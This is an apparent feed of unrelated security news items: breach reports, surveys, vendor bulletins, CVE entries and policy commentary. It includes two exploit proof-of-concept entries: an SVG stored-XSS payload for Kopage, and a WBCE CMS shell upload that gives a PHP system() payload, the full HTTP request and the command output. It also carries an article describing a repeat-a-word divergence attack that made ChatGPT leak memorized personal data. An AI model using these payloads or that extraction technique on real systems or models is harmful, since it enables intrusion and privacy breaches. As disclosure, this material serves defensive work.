The agency, known as JAXA, has shut down parts of its network as it conducts an investigation to discover the scope and impact of the breach.

Source: Tofino via Alamy Stock Photo

Japan's Space Exploration Agency (JAXA) reported this week that it experienced a cyber incident this past summer stemming from a breach of Microsoft Active Directory (AD) — raising concerns that nation-state actors might be after the country's space program data.

Chief cabinet secretary Hirokazu Matsuno raised the topic of the incident in a morning briefing on Nov. 29, mentioning that the agency investigated and preliminarily found that illegal access had indeed taken place. The agency was allegedly unaware of the attack until it was contacted by the authorities.

As mentioned, the breach was located in the organization's AD environment, the central server that manages access control for JAXA's network, including admin passwords for corporate applications. According to The Japan News, an official related to JAXA reportedly stated that "as long as the AD server was hacked, it was very likely that most of the information was visible. This is a very serious situation," though there is much that has not yet been confirmed.

This is not the first time that this Microsoft component has led to a compromise of information. Just earlier this year, US Sen. Ron Wyden (D-Ore.) wrote to the heads of CISA, the Justice Department, and the FTC asking them to hold Microsoft responsible after a Microsoft 365 breach due to three vulnerabilities in its Exchange Online email service and the Azure Active Directory. And just prior to that, it was discovered that a stolen Microsoft account key could allow threat actors to create access tokens for a variety of different types of Azure Active Directory applications.

**State-Sponsored Hackers After Japan's Space Program Secrets?**

The breach raises concerns that Japan's space program has been exposed, according to Ted Miracco, CEO of mobile security company Approov, who noted that JAXA has been a target before; in 2016 and 2017, JAXA was among 200 Japanese companies and research institutes allegedly targeted by Chinese military hackers.

"The cyberattack on Japan's aerospace exploration agency bears all the characteristics reminiscent of past incidents, raising questions about the involvement of state-sponsored actors," Miracco said via email. "In the historical context, previous attacks were linked to Chinese military hackers, and the reported exploitation of a vulnerability disclosed by a network equipment manufacturer in June adds a layer of sophistication to the attack, indicating a state-sponsored attack.

He added, "The motivation behind the cyber intrusion, given the nature of JAXA's operations in satellite development and advanced missions, points towards an interest in strategic intelligence and technological advancements. Understanding the identity, methods, and motivations of the perpetrators becomes crucial in fortifying cybersecurity measures to mitigate future risks, as these attacks are unlikely to stop anytime soon."

Meanwhile, JAXA has shut down part of its network and launched a full investigation to determine the scope of the breach and its impact. The agency is working with the central government, as well as police, on the matter.

Japan's Space Program at Risk After Microsoft Active Directory Breach

UAE security leaders warn that people, tech, and process gaps are exposing their organizations to cybercrime.

Source: Chroma Craft Media Group via Alamy Stock Photo

A vast majority of security chiefs in the United Arab Emirates believe their organization must improve how their teams, processes, and tech function in order to mitigate future cyberattacks.

Research by Trellix recently found that 96% of CISOs — who have experienced security incidents — feel improvements are needed, while 52% of respondents say their organization doesn't possess the technical knowledge to handle complex security incidents.

**Reliance on Manual Processes**

Forty-eight percent of security leaders believe that their organization is too reliant on manual processes, which hampers the mean time to detect and repair cyber incidents.

In addition to this, 44% blame the failure to fight cybercrime on poorly documented and implemented processes, with another 44% warning that disconnected security controls caused a lack of context.

Jake Moore, global cybersecurity adviser at ESET, says continual investment in protection is crucial for companies as cyber threats are increasingly sophisticated and common.

"Furthermore, now with the introduction of AI threats we are seeing cyberattacks become even more relentless and powerful," he says. "Companies need to bear in mind that the cost of recovery from an attack usually outweighs the cost of preventive security measures."

**Mind the Gaps**

While gaps in technical resources make it difficult for organizations to spot and respond to cybersecurity incidents, stretched or ill-equipped security teams also make this difficult. More than half of respondents (52%) cited gaps in their security capabilities as contributors to a security incidents experienced by their organization. 

Meanwhile, 44% admitted that they hadn’t properly configured their IT stacks or enabled their detection policies. A further 40% said their IT and security tools don't offer “adequate visibility” of incidents. 

Moore says: "Neglecting cybersecurity in terms of the people and process can leave a business dangerously exposed to preventable or mitigable attacks with potentially severe consequences."

**About the Author(s)**

Technology Journalist

Nicholas Fearn is a freelance tech journalist from the Welsh valleys. He's written for major outlets like Forbes, Financial Times, The Guardian, The Independent, The Telegraph, HuffPost and Business Insider, as well as tech publications like Gizmodo, TechRadar, Laptop Mag, Computer Weekly, ITPro and many more. When Nicholas isn't geeking over the latest gadgets and tech trends, he's probably listening to Mariah Carey on repeat.

Emirates CISOs Flag Rampant Cybersecurity Gaps

IBM Administration Runtime Expert for i 7.2, 7.3, 7.4, and 7.5 could allow a local user to obtain sensitive information caused by improper authority checks.  IBM X-Force ID:  265266.

  

**Summary**

IBM Administration Runtime Expert for i could allow sensitive information stored in a file, including passwords, to be obtained by an attacker as described in the vulnerability details section. IBM Administration Runtime Expert for i has addressed the vulnerability with a fix as described in the remediation/fixes section.

**Vulnerability Details**

**CVEID:**   CVE-2023-42006  
**DESCRIPTION:**   IBM Administration Runtime Expert for i could allow a local user to obtain sensitive information caused by improper authority checks.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/265266 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Administration Runtime Expert for i

7.5

IBM Administration Runtime Expert for i

7.4

IBM Administration Runtime Expert for i

7.3

IBM Administration Runtime Expert for i

7.2

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

29 Nov 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG60","label":"IBM i"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0, 7.4.0, 7.3.0, 7.2.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2023-42006: Security Bulletin: IBM Administration Runtime Expert for i is vulnerable to an attacker obtaining sensitive information due to CVE-2023-42006

By Deeba Ahmed
Google will delete free Google accounts that have not been signed into for two years and do not have any active subscriptions.
This is a post from HackRead.com Read the original post: Google to Delete Inactive Gmail Accounts From Today: What You Need to Know

According to Google, once your Gmail account is deleted, it will not be possible to recover photos, files, emails, contact information, or purchases such as music, apps, movies, or books that you may have acquired using your Google account.

Google has officially released its inactive account policy according to which it will delete free Google accounts that have not been signed into for two years and do not have any active subscriptions. This policy applies to personal Google Accounts, not those not set up through school, work, or other organizations.

However, this policy doesn’t apply to paid Google Workspace accounts or accounts with an active subscription. For instance, if you have subscribed to Google One, your account will remain active even without regular sign-ins. If you maintain any paid subscriptions within an app via Google Play, this will also be considered an activity.

A Google Account is necessary to access the different Google products, including Gmail, YouTube, and Google Ads, with a single username and password. The updated policies were announced in May 2023 and will be implemented starting 1st December 2023.

So, if it’s been two years since you used your free Google account, Google may delete it. Per the policies, if deleted, it won’t be possible to recover photos, files, emails, contact information, or purchases such as music, apps, movies, or books you may have acquired using your Google account. If you want to keep your Google account active, sign into it at least once every two years and perform any activity.  

For your information, Google considers a Google account active that is regularly used. This is indicated by several activities, such as watching a YouTube video, Google search, downloading apps, using Google Drive, or checking Gmail.

The account tracks Google account activity, and not the device, so any actions taken on a device while being signed into a Google Account will be an activity. You must also sign in to Photos at least once every two years to maintain access to Google Photos and any photos uploaded from your free account. To sign in, you can use Google Photos web or mobile version.

It is possible to maintain access to your Google account and its content because Google lets you choose people who can access your account if you cannot do so yourself. Before deleting the account, Google will notify the account owner via emails sent to the Google Account and to the recovery email (if applicable).

If you don’t want or need a Google account, you can allow it to be deleted after a period of inactivity or delete it yourself. However, make sure to export any stored data using Google Takeout.

To delete a Google account, sign in with the account you want to delete, go to the Data & Privacy page, scroll to the bottom, and select Delete Your Google Account. Follow the prompts to authenticate and confirm that you want to delete the account.

Keeper Security’s VP of Security and Compliance, Patrick Tiquet, shared the following comment on this newly implemented policy with Hackread.com.

“Inactive accounts can present significant cybersecurity risks, as these accounts may retain weak or unchanged passwords, creating vulnerabilities for unauthorized access and potential misuse by cybercriminals for phishing attacks or data exposure. When you combine the personal information stored in these accounts and potential interconnections to other services, there is a heightened risk of identity theft and unauthorized access to linked accounts. Additionally, the lack of monitoring for inactive accounts increases the likelihood of users being unaware of suspicious activities, allowing bad actors more time to exploit the compromised accounts.”

Synopsys Software Integrity Group’s associate principal security consultant, Ben Hutchison, also shared his thoughts on this development.

“Continuing to maintain a large number of inactive accounts is a little bit like not replacing those old, cracked windows on your property and in essence the potential attack surface of the system. Inactive accounts provide a means of potential ingress or compromise for attackers to take advantage of, and since they have by definition gone unused for long periods of time, they may be protected by weak locks (passwords) and their owners (users) are unlikely to notice signs of compromise or unauthorized activity.”

“Compromising one account may lead to a cascade if the account compromised enables access to other platform services, the user reuses their password for other accounts or in the specific case of email compromise, providing attackers with the opportunity to abuse account reset workflows for other systems/services in combination with compromised credentials in the hope that the compromised account is linked to one of these, leading to further eventual takeovers,” Hutchison added.

****_RELATED ARTICLES_****

1.  Google offers Dark Web monitoring for US Gmail users
2.  Google will ‘auto-delete’ your location & web activity data
3.  How to Delete Your Facebook Account Permanently – Guide
4.  Is It Possible to Delete Yourself From the Internet Altogether?
5.  Facebook Messenger to offer Unsend feature to delete sent messages

Google to Delete Inactive Gmail Accounts From Today: What You Need to Know

Saudi companies are seeking extra help in droves, because of a lack of tools and personnel.

Source: Hakan Gider via Alamy Stock Photo

More than half of Saudi Arabian companies plan to outsource their cybersecurity measures in the next year, as a lack of resources continues to plague the region.

Up to 58% of respondents plan to invest in different forms of outsourcing cybersecurity in the next 12 to 18 months as a measure to strengthen their posture, according to research from Kaspersky. Reasons given include a lack of necessary tools for threat detection (22%), and a shortage of internal IT security staff (34%).

Also, 42% plan to outsource their cybersecurity to managed service providers (MSPs), while 10% want the help of external consulting specialists.

The push for outsourcing comes as 71% of Saudi companies reported a cyber incident over the last two years, and 74% said the incidents were "serious."

**About the Author(s)**

Saudi Companies Outsource Cybersecurity Amid 'Serious' Incidents

A more proactive approach to fighting cyberattacks for US companies and agencies is shaping up under the CISA's proposal to emphasize real-time attack detection and response.

Source: Wavebreakmedia Ltd IFE-210813 via Alamy Stock Photo

COMMENTARY

The United States faces an ever-growing threat of cyberattacks on its critical infrastructure, government agencies, and private sector companies.

These attacks can have severe consequences, from the theft of sensitive information to the disruption of essential services. To effectively combat these threats, the US needs to adopt a comprehensive and proactive approach to cybersecurity, similar to the one taken by Germany with its IT-SiG 2.0 mandate.

Where are we now, and are we on the right track to adopt a similar mandate on this side of the Atlantic?

**The IT-SiG Approach Compared With the US's Current Capabilities**

One of the key features of the IT-SiG 2.0 mandate is its emphasis on real-time attack detection and response. This approach recognizes that preventing all cyberattacks is impossible and focuses on quickly identifying and mitigating the effects of successful attacks. This mitigation is achieved through advanced security technologies, such as intrusion-detection systems, security information and event management (SIEM) systems, and security orchestration, automation, and response (SOAR) systems, which can detect and respond to potential threats in near real time.

In contrast, the US has traditionally relied on patching vulnerabilities and responding to attacks after they have occurred and, ideally, been resolved. While this approach can effectively mitigate the effects of individual attacks, more is needed to keep pace with the rapidly evolving cyber-threat landscape. The US has needed a more proactive approach, like the IT-SiG 2.0 mandate, emphasizing real-time attack detection and response to stay ahead of potential threats.

**With This Strategy, Visibility Is Key**

Another critical aspect of the IT-SiG 2.0 mandate is its focus on improving visibility into the cybersecurity posture of organizations. Visibility is achieved through regular security assessments and penetration testing, which help identify vulnerabilities and weaknesses in an organization's systems and networks. By comprehensively understanding an organization's cybersecurity posture, the IT-SiG 2.0 mandate encourages organizations to identify issues and take steps to remediate them, improving overall security.

The United States has taken steps toward improving visibility into the cybersecurity posture of federal agencies with the Cybersecurity & Infrastructure Security Agency's Binding Operational Directive 23-01 in October 2022. However, this directive only applies to federal agencies and not to private-sector companies; many organizations may not have the same level of visibility into their cybersecurity posture as federal agencies.

According to Statista's Research Department, in the fiscal year 2020 the number of cybersecurity incident reports by federal agencies in the United States was over 30,000, around an 8% increase from the previous year.

To effectively combat cyber threats, it's essential that all organizations, not just federal agencies, have the necessary visibility into their cybersecurity posture. Therefore, the US should consider expanding the reach of Directive 23-01, like the IT-SiG 2.0 mandate, to include private-sector companies. This expansion would ensure that all organizations have visibility into their cybersecurity protection.

**Recent US Steps**

In brighter news, we might be beginning on the path toward a more effective national cybersecurity strategy akin to IT-SiG 2.0. In March, the Biden administration announced its National Cybersecurity Strategy. Among the plan's emphases are defending critical infrastructure; disrupting the ability for cybercriminals to attack agencies, organizations, and individuals; encouraging market forces to lead the way to broader security and resilience; and fostering international collaboration between private and public sectors to stay ahead of bad actors.

It appears the plan emphasizes less the cybersecurity tools that will be used and more the means of making sure they're being adopted and used correctly, shoring up weak links in complex business and government affairs. While the White House laid out this plan, a significant amount of the burden will fall on the shoulders of those most capable of fighting back against waves of cyberthreats — namely, the business world alongside the government. A redefinition of the "social contract" of cybersecurity seems to be what they're after here, with smaller businesses and individuals able to benefit from the processes put in place by larger organizations.

Taking up this plan and running with it, in August the Cybersecurity & Infrastructure Security Agency (CISA) released its Cybersecurity Strategic Plan for the fiscal years 2024 through 2026. "It's up to all of us, government and private sector, domestic and international, to execute \[the cybersecurity plan\]," Eric Goldstein, Executive Assistant Director for Cybersecurity wrote on the CISA website.

How does CISA's plan compare with IT-SiG 2.0? If we're going by real-time attack detection and visibility as the main driving points, then CISA's plan directly lines up, at least in concept. CISA's plan outlines three major goals: address immediate threats, harden the terrain, and drive security at scale.

So, visibility into vulnerabilities, quick real-time responses, and proactive mitigation of weaknesses that could be exploited are the primary focus. While this is still in plan form, it does seem like CISA has homed in on the same key points the IT-SiG 2.0 is going after.

**Looking Toward a More Secure Future**

Statista's Research Department found that in the first half of 2022, the number of data compromises in the US came in at 817 cases. Over 53 million individuals were affected by those data compromises, which included data breaches, data leakage, and data exposure.

The US faces an ever-growing threat of cyberattacks on its critical infrastructure, government agencies, and private sector companies. To effectively combat these threats, the United States needs to adopt a comprehensive and mandated approach to cybersecurity, similar to the one taken by Germany with its IT-SiG 2.0 mandate. This approach forces real-time attack detection and response, improves visibility into organizations' cybersecurity approach, and offers a solid beginning to a more secure digital world.

There's work to be done — by both government agencies and businesses, as the shift in the social contract implores everyone to do what they can — but by taking these first steps, the United States can improve its overall cybersecurity posture for all companies and better protect digital assets against potential threats.

**About the Author(s)**

CTO & Co-Founder, SecurityBridge

Ivan Mans is a long time SAP technology consultant, having worked in the SAP space since 1997 — the early days of R/3. In 2012, Ivan co-founded SecurityBridge, and in his current role as CTO, he is a motivated driver, inspires people, and pushes technology that contributes to the continuous innovation of the SecurityBridge Platform. In recent years, Ivan has been a regular speaker at SAP events, evangelizing SAP security.

The US Needs to Follow Germany's Attack-Detection Mandate

Kopage Website Builder version 4.4.15 suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)#Date: 1/12/2023#Exploit Author: tmrswrr#Vendor Homepage: https://www.kopage.com/#Version: Version : 4.4.15#Tested on: https://demo.kopage.com/index.php#Poc:1 ) Install the system through the website and log in with any user.2 ) Go to Files field and click upload 3 ) Upload your svg filePayload :<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">    <script>//<![CDATA[        alert(document.domain)    //]]>    </script></svg>4 ) Open svg file url you will be see alert button.Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg

Kopage Website Builder 4.4.15 Cross Site Scripting

WBCE CMS version 1.6.1 suffers from a remote shell upload vulnerability.

# Exploit Title: WBCE CMS Version : 1.6.1  Remote Command Execution  
# Date: 30/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip  
# Version: 1.6.1  
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1 ) Login with admin cred and click Add-ons  
2 ) Click on Language > Install Language  > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php  
4 ) You will be see id command result 

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 

### Post Request:

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1  
Host: demos6.softaculous.com  
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459  
Content-Length: 522  
Origin: https://demos6.softaculous.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"  
Content-Type: application/x-php

<?php echo system('id'); ?>

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="submit"

-----------------------------86020911415982314764024459--

### Response : 



  
<div class="row" style="overflow:visible">  
<div class="fg12">  
<table id="former_positioning_table">  
<tr>  
    <td class="content">  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
    <div class="top alertbox_error fg12 error-box">  
        <i class=" fa fa-2x fa-warning signal"></i>

                    <p>Invalid WBCE CMS language file. Please check the text file.</p>

                            <p><a href="index.php" class="button">Back

WBCE CMS 1.6.1 Shell Upload

Access to critical Unified Diagnostics Services (UDS) of the Modular Infotainment Platform 3 (MIB3) infotainment is transmitted via Controller Area Network (CAN) bus in a form that can be easily decoded by attackers with physical access to the vehicle.

Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.







**CVE ID**

**CVE-2023-28896**

**Description**

Access to critical Unified Diagnostics Services (UDS) of the Modular Infotainment Platform 3 (MIB3) infotainment is transmitted via Controller Area Network (CAN) bus in a form that can be easily decoded by attackers with physical access to the vehicle.

Vulnerability discovered on Škoda Superb III (3V3) – 2.0 TDI manufactured in 2022.

**Refereneces**

**Problem Type**

**CWE-261 Weak Encoding for Password**

**CAPEC ID**

**CAPEC-115 Authentication Bypass**

**Affected Products**

**CVSS3.1 Score**

3.5: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2023-28896: CVE-2023-28896: Weak encoding for password in UDS services - Automotive Security Research Group

Apparently all it takes to get a chatbot to start spilling its secrets is prompting it to repeat certain words like "poem" forever.

Source: Ascannio via Shutterstock

Can getting ChatGPT to repeat the same word over and over again cause it to regurgitate large amounts of its training data, including personally identifiable information and other data scraped from the Web?

The answer is an emphatic yes, according to a team of researchers at Google DeepMind, Cornell University, and four other universities who tested the hugely popular generative AI chatbot's susceptibility to leaking data when prompted in a specific way.

**'Poem' as a Trigger Word**

In a report this week, the researchers described how they got ChatGPT to spew out memorized portions of its training data merely by prompting it to repeat words like "poem," "company," "send," "make," and "part" forever.

For example, when the researchers prompted ChatGPT to repeat the word "poem" forever, the chatbot initially responded by repeating the word as instructed. But after a few hundred times, ChatGPT began generating "often nonsensical" output, a small fraction of which included memorized training data such as an individual's email signature and personal contact information.

The researchers discovered that some words were better at getting the generative AI model to spill memorized data than others. For instance, prompting the chatbot to repeat the word "company" caused it to emit training data 164 times more often than other words, such as "know."

Data that the researchers were able to extract from ChatGPT in this manner included personally identifiable information on dozens of individuals; explicit content (when the researchers used an NSFW word as a prompt); verbatim paragraphs from books and poems (when the prompts contained the word "book" or "poem"); and URLs, unique user identifiers, bitcoin addresses, and programming code.

**A Potentially Big Privacy Issue?**

"Using only $200 USD worth of queries to ChatGPT (gpt-3.5-turbo), we are able to extract over 10,000 unique verbatim memorized training examples," the researchers wrote in their paper titled "Scalable Extraction of Training Data from (Production) Language Models."

"Our extrapolation to larger budgets suggests that dedicated adversaries could extract far more data," they wrote. The researchers estimated an adversary could extract 10 times more data with more queries.

Dark Reading's attempts to use some of the prompts in the study did not generate the output the researchers mentioned in their report. It's unclear if that's because ChatGPT creator OpenAI has addressed the underlying issues after the researchers disclosed their findings to the company in late August. OpenAI did not immediately respond to a Dark Reading request for comment.

The new research is the latest attempt to understand the privacy implications of developers using massive datasets scraped from different — and often not fully disclosed — sources to train their AI models.

Previous research has shown that large language models (LLMs) such as ChatGPT often can inadvertently memorize verbatim patterns and phrases in their training datasets. The tendency for such memorization increases with the size of the training data.

Researchers have shown how such memorized data is often discoverable in a model's output. Other researchers have shown how adversaries can use so-called divergence attacks to extract training data from an LLM. A divergence attack is one in which an adversary uses intentionally crafted prompts or inputs to get an LLM to generate outputs that diverge significantly from what it would typically produce.

In many of these studies, researchers have used open source models — where the training datasets and algorithms are known — to test the susceptibility of LLM to data memorization and leaks. The studies have also typically involved base AI models that have not been aligned to operate in a manner like an AI chatbot such as ChatGPT.

**A Divergence Attack on ChatGPT**

The latest study is an attempt to show how a divergence attack can work on a sophisticated closed, generative AI chatbot whose training data and algorithms remain mostly unknown. The study involved the researchers developing a way to get ChatGPT "to 'escape' out of its alignment training" and getting it to "behave like a base language model, outputting text in a typical Internet-text style." The prompting strategy they discovered (of getting ChatGPT to repeat the same word incessantly) caused precisely such an outcome, resulting in the model spewing out memorized data.

To verify that the data the model was generating was indeed training data, the researchers first built an auxiliary dataset containing some 9 terabytes of data from four of the largest LLM pre-training datasets — The Pile, RefinedWeb, RedPajama, and Dolma. They then compared the output data from ChatGPT against the auxiliary dataset and found numerous matches.

The researchers figured they were likely underestimating the extent of data memorization in ChatGPT because they were comparing the outputs of their prompting only against the 9-terabyte auxiliary dataset. So they took some 494 of ChatGPT's outputs from their prompts and manually searched for verbatim matches on Google. The exercise yielded 150 exact matches, compared to just 70 against the auxiliary dataset.

"We detect nearly twice as many model outputs are memorized in our manual search analysis than were detected in our (comparatively small)" auxiliary dataset, the researchers noted. "Our paper suggests that training data can easily be extracted from the best language models of the past few years through simple techniques."

The attack that the researchers described in their report is specific to ChatGPT and does not work against other LLMs. But the paper should help "warn practitioners that they should not train and deploy LLMs for any privacy-sensitive applications without extreme safeguards," they noted.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#auth